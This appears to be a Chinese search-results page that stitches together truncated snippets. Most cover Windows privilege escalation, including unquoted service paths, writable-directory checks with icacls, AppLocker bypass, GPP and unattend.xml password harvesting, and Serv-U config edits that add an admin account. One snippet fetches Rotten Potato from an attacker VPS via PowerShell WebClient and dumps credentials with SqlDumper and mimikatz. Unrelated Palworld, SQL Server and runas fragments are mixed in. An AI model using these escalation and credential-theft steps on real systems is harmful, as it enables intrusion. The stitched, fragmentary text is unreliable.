项目地址:https://github.com/DarkCoderSc/win-brute-logon 目标:Windows XP 到最新的 Windows 10 版本 (1909) 用法 词表文件...Microsoft Windows 身份验证机制中的一个严重弱点,而不是一个漏洞。...PoC 测试场景(使用访客账户) 在 Windows 10 上测试 安装和配置新更新的 Windows 10 虚拟机或物理机。...在我的情况下,完整的 Windows 版本是:1909 (OS Build 18363.778) 以管理员身份登录并让我们创建两个不同的帐户:一个管理员和一个普通用户。两个用户都是本地用户。 /!...将 PoC 可执行文件放在您作为访客用户可以访问的任何地方。
例如,管理员可以使用 AppLocker 设置规则,仅允许用户执行 C:\Program Files\* 中的 EXE 文件。...好吧,我们可以检查 C:\Program Files 和 C:\Windows 中所有文件夹的权限;然而,幸运的是,有人已经这样做了,并创建了标准用户可以在 C:\Windows\* 中写入的默认文件夹列表...假设我们在 C:\Windows\* 中没有找到任何可写文件夹,我们的下一个选择是尝试在 C:\Program Files 中找到可写文件夹或文件。...由于 C:\Program Files 中没有任何可供标准用户写入的默认文件夹/文件,因此我们需要关注非默认文件夹。...icacls "C:\Program Files\Program" 不幸的是,我们发现我们没有这个文件夹的写权限,我们将无法在此处复制可执行文件。
管理员凭证配置错误 服务配置错误 故意削弱的安全措施 用户权限过高 系统服务权限配置错误 windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。...但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务 系统服务权限配置错误(可写目录漏洞)有如下两种可能。 1.服务未运行:攻击者会使用任意服务来替换原来的服务,然后重启服务。...#将test改为Program.exe之后并放入C盘下 $ C:\Program Files\Test\test.exe [*] Executed C:\Program 对于上面的空格,Windows...这里我们使用Windows内建的一个工具,icacls,下面我们用这个工具依次来检查 “C:\Program Files” “C:\Program Files\Common Files” “C:\Program...六、 针对组策略首选项提取的防御措施 1.设置共享文件夹SYSVOL的访问权限 2.将包含组策略密码的XMl文件从SYSVOl目录中删除 3.不要把密码放在所有域用户都有权访问的文件中 4.如果需要更改域中机器的本地管理员密码
这方面的一个例子是在“C:\Program Files”目录中创建的目录与“C:\”目录中创建的目录的继承权限之间的明显差异。...相比之下,“Program Files”目录默认不包含此权限,“Program Files”中创建的文件夹默认阻止非特权用户写入,如下图所示。...通过执行一个简单的实验,我们可以确认预期的行为。作为管理员,在 C:\Program Files\test 和 C:\test 中创建两个名为“test”的文件夹。...请注意,非管理员用户可以写入 C:\test\ 但不能写入 C:\Program Files\test\,如下图所示。...相反,该服务将仅检查“C:\Windows\System32\”目录中的 DLL 文件。虽然这对横向移动和持久性都有用,但在我们希望利用这种情况下的可写路径目录漏洞的情况下,它就没有用了。
:dir c:\windows\ 查看制定文件的内容:type c:\windows\1.asp 把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows...默认用户组users对该目录拥有查看权限 Remote.ini文件中存放着G6FTP的密码 c:\Program Files\RhinoSoft.com\Serv-U\c:\Program...Files\Serv-U\ 默认用户组users对该目录拥有查看权限 ServUDaemon.ini 中存储了虚拟主机网站路径和密码 c:\windows\system32\inetsrv\...执行成功的回显信息 Maintenance=System 权限类型多加一行指定新加帐号为系统管理员 ReloadSettings=True 在修改ini文件后需加入此项,这时serv-u会自动刷新配置文件并生效...可行思路大全: 经测试以下目录中的文件权限均为everyone,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行: 360杀毒db文件替换: c:\Program Files\360\360SD
在这里举一个例子 假设有一个服务路径:C:\Program Files\Some Folder\Service.exe Windows在命令解释程序可能会遇到名称中的空格,并且希望通过引号将其转义。...如果系统运行该服务,他将尝试以下可执行文件: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe...如果在C盘上传一个名为Program.exe的文件,当Service.exe重启的时候,在大多数情况下Program.exe就会以System权限运行。...在这个过程中,会使用安装配置文件。如果管理员没有清理的话,那么会在机器上有一个unattend.xml的文件,这个文件包含苏哦有在安装过程中的配置,包括一些本地用户的配置,以及管理员账号的密码。...需要UAC的授权才能进行的操作: 配置Windows Update 添加/删除用户 更改账户类型 更改UAC的设置 安装ActiveX 安装/卸载程序 安装设备驱动程序 将文件移动/复制到Program
icacls "C:\\Program Files (x86)" icacls "C:\\Program Files (x86)\\Photodex" icacls "C:\\Program Files...(M):修改 (F):完全控制 (CI):从属容器将继承访问控制项 (OI):从属文件将继承访问控制项 将恶意程序放在C:\Program Files (x86)\Photodex\ProShow...在启用了 UAC 后,所有用户帐户(包括管理帐户)都将使用标准用户权限运行,因此当管理组中的用户需要以管理员身份运行某程序时,Windows就提弹出提示。...但是系统在检查可信任目录的时候,会自动去除目录的空格,因此我们可创建一个C:\Windows \System32的目录来绕过可信性目录的检查(因为原始的目录需要最高的权限),然后将白名单文件复制到创建的目录中...获取组策略凭据 在大型环境环境或域环境中,管理员往往会通过下发组策略对所有加入域的计算机的本地管理员密码进行批量修改; 新建一个组策略后,域控制器会在SYSVOL共享目录中生成一个XML文件,在文件保存了组策略更新后的密码
现在尝试提权,利用烂土豆直接提,windows下载文件的方式有很多,这里选择powershell的下载方式: 将烂土豆放在vps的web目录 ?...在弹回来的powershell中习惯性进入c:\windows\tasks目录,dir发现无文件,然后输入 $ client=new-object System.Net.WebClient 再输入:..."C:\Program Files\Microsoft SQL Server\130\Shared\SqlDumper.exe" 1316 0 0x01100 复制到本地,管理员打开mimikatz,运行以下语句...以上,默认在缓存中禁止保存明文密码,可以修改注册表并且管理员需要重新登陆才能成功抓取明文,不过可以解密一下NTLM ?...不过这个站没有内网,后来也就没有进行下去了。 ? 后续在服务器继续翻点配置文件的操作,用来写报告的就不多赘述了。因为是授权的,痕迹也不用清了,接下来就是交报告了。
自动化提权,回来的的权限就是system #当工具无法使用时,也可以手工查找,使用Windows内建工具icacls查看服务启动路径中写权限 例如:icacls “C:\Program Files”...原理:对于C:\Program Files\Some Folder\Service.exe文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字向匹配的程序。...以上面的例子为例,windows会依次尝试确定和执行下面的程序: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder...Program.exe,而不是C:\Program Files\Some Folder\Service.exe,那么我们的恶意程序就会以system权限运行(大多数情况下)。...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件
理论上,低权限用户是没有对高权限服务调用的可执行文件写权限,但是,如果因管理员错误的配置,导致一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么低权限用户就可以将该文件替换成任意可执行文件,...自动化提权,回来的的权限就是system #当工具无法使用时,也可以手工查找,使用Windows内建工具icacls查看服务启动路径中写权限 例如:icacls “C:\Program Files”...简介:windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的时间执行程序或脚本(在大多数情况下,计划任务是以NT AuthoritySystem高权限执行的),如果地权限用户对计划任务所在目录有读写权限...以上面的例子为例,windows会依次尝试确定和执行下面的程序: C:\Program.exe C:\Program Files\Some.exe C:\Program Files...(通过注册表,可以启用/禁用该设置,但您需要正确的权限才能执行此操作) 修改受保护的目录(例如Windows文件夹,Program Files) 计划任务(例如,以管理员权限自动启动) UAC不会自动阻止恶意软件
、管理员(Administrators)、SYSTEM等等,以不同的身份去对这个软件进行操作时,就会有不同的访问权限,一般Administrator的权限是最大的 1)安装Sql Server不用多少时间...Server配置管理器,但是打开后,就萌B了,从来没有遇到这个·问题: 3)随后,再网上试了很多了办法,还是不行,最后尝试了这个方法 在cmd命令窗口中输入cd C:\Windows\System32mofcomp.exe...在64位系统的系统盘中会存在program files和program files(x86)两个文件夹。前者用来存放64位文件,后者用来存放32位文件。...这两个文件夹的存在使得目前64为操作系统可兼容32为程序,也可以说是为了兼容32位程序,program files(x86)这个文件夹才会存在。...所以你还要留意一下sqlmgmproviderxpsp2up.mof是在C:\ProgramFiles\MicrosoftSQLServer,还是在C:\Program Files(x86)\Microsoft
C:\Program Files\PalServer\steam\steamapps\common\PalServer\Pal\Saved (可选)如果没有使用一键部署,则需要需要登陆 Windows...例如:C:\Program Files\PalServer\steam\steamapp\common\PalServer\Pal (可选)为避免旧档丢失,先将旧文件夹重命名为 Saved_old。...C:\Program Files\PalServer\steam\steamapps\common\PalServer\Pal\Saved (可选)如果没有使用一键部署,则需要需要登陆 Windows...在弹窗中选择【复制带签名的临时链接】,复制下面的URL。 5.3 进入windows服务器,将URL粘贴到浏览器中,直接将备份文件下载到服务器上。 5.4 解压缩备份文件,复制 Saved文件夹。...例如:C:\Program Files\PalServer\steam\steamapp\common\PalServer\Pal\Saved (可选)为避免旧档丢失,先将旧文件夹重命名为 Saved_old
03 Trusted Service Paths漏洞产生原因 windows服务通常都是以System权限运行的,所以系统在解析服务的二进制文件对应的文件路径中的空格的时候也会以系统权限进行解析。...例如,有如下的文件路径: C:\Program Files\Some Folder\Service.exe 对于上面文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前的名字向匹配的程序...以上面的例子为例,windows会依次尝试确定和执行下面的程序: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder...4.2 检查对有漏洞目录是否有写入的权限,这个很关键 这里我们使用Windows内建的一个工具,icacls,下面我们用这个工具依次来检查“C:\Program Files”、“C:\Program Files...很幸运,直到我们尝试到最后一个“C:\Program Files\Program Folder”文件夹时成功了,看到Everyone(OI)(CI)(F)没有。如下图所示。
C:\Program Files\PalServer\steam\steamapps\common\PalServer\Pal\Saved (可选)如果没有使用一键部署,则需要需要登陆 Windows...C:\Program Files\PalServer\steam\steamapps\common\PalServer\Pal\Saved (可选)如果没有使用一键部署,则需要需要登陆 Windows...在弹窗中选择【复制带签名的临时链接】,复制下面的URL。 5.3 进入windows服务器,将URL粘贴到浏览器中,直接将备份文件下载到服务器上。 5.4 解压缩备份文件,复制 Saved文件夹。...C:\Program Files\PalServer\steam\steamapps\common\PalServer\Pal\Saved (可选)如果没有使用一键部署,则需要需要登陆 Windows...3.3 下方命令参数填入您的信息: ● sourceFolderPath:第1步中帕鲁存档所在的Saved文件路径,例如 C:\Program Files\PalServer\steam\steamapps
Trusted Service Paths漏洞产生原因 windows服务通常都是以System权限运行的,所以系统在解析服务的二进制文件对应的文件路径中的空格的时候也会以系统权限进行解析。...例如,有如下的文件路径: C:\Program Files\Some Folder\Service.exe 对于上面文件路径中的每一个空格,windows都会尝试寻找并执行名字与空格前名字相匹配的程序。...以上面的例子为例,windows会依次尝试确定和执行下面的程序: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder...这里我们使用Windows内建的一个工具,icacls,下面我们用这个工具依次来检查 “C:\Program Files” “C:\Program Files\Common Files” “C:\Program...图3 查看目录权限 很幸运,直到我们尝试到最后一个 “C:\Program Files\Program Folder” 文件夹时成功了,看到Everyone(OI)(CI)(F)没有。如图4所示。
更有趣的是,当程序打开一个项目文件时,它会立即将其解压缩到位于其安装目录中的一个临时目录中: XDPPro.exe 将几个文件写入 C:\Program Files\XINJE\XDPPro\tmp...很快,确实发现了一个 zip slip 漏洞(CVE-2021-34605),该漏洞可以为攻击者提供具有程序权限的任意写入权限;在大多数情况下,这些将是管理员权限。...没有找到它并回退到 C:\Windows\System32 有趣的是,它正在尝试使用LoadLibrary从其本地目录加载 .dll 文件。...当 LoadLibrary 没有找到它们时,它会恢复到在 C:\Windows\System32 中搜索它们。...稍后在加载新项目的过程中,将加载此 DLL 而不是真正的 DLL(位于Windows\System32中)。 加载 DLL 后,恶意代码会在其 DLLMain 过程或程序导入的函数之一中执行。
当Windows尝试运行该服务时,它将使用以下路径运行它可以找到的第一个可执行文件。 1. C:\Program.exe 2. C:\Program Files.exe 3....C:\Program Files (x86) \Shared Services\shared commands\vulnerable.exe 如果我们在最终执行路径之前拥有对这些文件夹的写入权限,我们可以在服务路径中添加我们自己的恶意可执行文件...,然后将可执行文件放入C:\Program Files(x86)\Shared Services文件夹中,如图10-14所示,因为用户具有写访问权限。...在某些情况下,可能会滥用作为系统或提升权限运行的可写服务。这是由于管理员为服务设置的权限不正确,或者用户账户在执行二进制文件的目录中具有提升的权限。...因为“共享文件”目录之间有一个空格文件将不工作,因为目录名后没有中断。Program.exe选项将起作用;但是,用户没有对文件夹的写入权限。
; 1.SQL Server 2008中服务帐户类型分为不具有 Windows 管理员权限的“内置系统帐户”和“域用户帐户”; 1.1 “内置系统帐户”又细分成三类“本地系统帐户”、“网络服务帐户”以及...: 实际名称为"NT AUTHORITY\LOCAL SERVICE", 账户是预设的拥有最小权限的本地账户与 Users 组的成员具有相同级别的资源和对象访问权限,该账户下的进程只能以没有凭据的空会话形式访问的网络资源...1.2 域用户帐户是一个使用 Windows 身份验证的域用户帐户以设置并连接到 SQL Server (建议使用最低权限的域用户帐户),因为 SQL Server 服务不需要管理员帐户特权; 如果服务必须与网络服务进行交互...WeiyiGeek.管理员账户与数据根目录 Step 7.再次进行安装配置规则检查 -> 安装配置文件路径 C:\Program Files\Microsoft SQL Server\100\Setup...如下图: 错误图示 问题解决: 在路径:C:\Users\你的用户名\AppData\Local\Temp\”文件夹下建好命名为 2 的文件夹,如果已经有 2 则看清楚是否是文件而不是文件夹,删掉文件改为文件夹
简单的 举个例子,你需要用administrator权限启动notepad.exe,你可以写成这样: runas /user:administrator notepad.exe 在某些情况下,为了安全起见...比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况...实际应用实例: @echo off runas /user:Colin-PC\Administrator /sa “C:\Program Files\Internet Explorer\iexplore.exe...向这样,我们将命令保存为批处理后,只要在用户电脑上运行这个批处理(第一次输入管理员密码),以后用户只要双击该文件就可会以管理员身份执行命令中所指定的程序了。 ————————- 这样就完了吗?...封装为.exe的程序后如下图: 这样,我们只要将该exe文件放在D:\Program Files目录下,然后再创建一个快捷方式到桌面,这样,用户下次就可以很方便的使用了。
领取专属 10元无门槛券
手把手带您无忧上云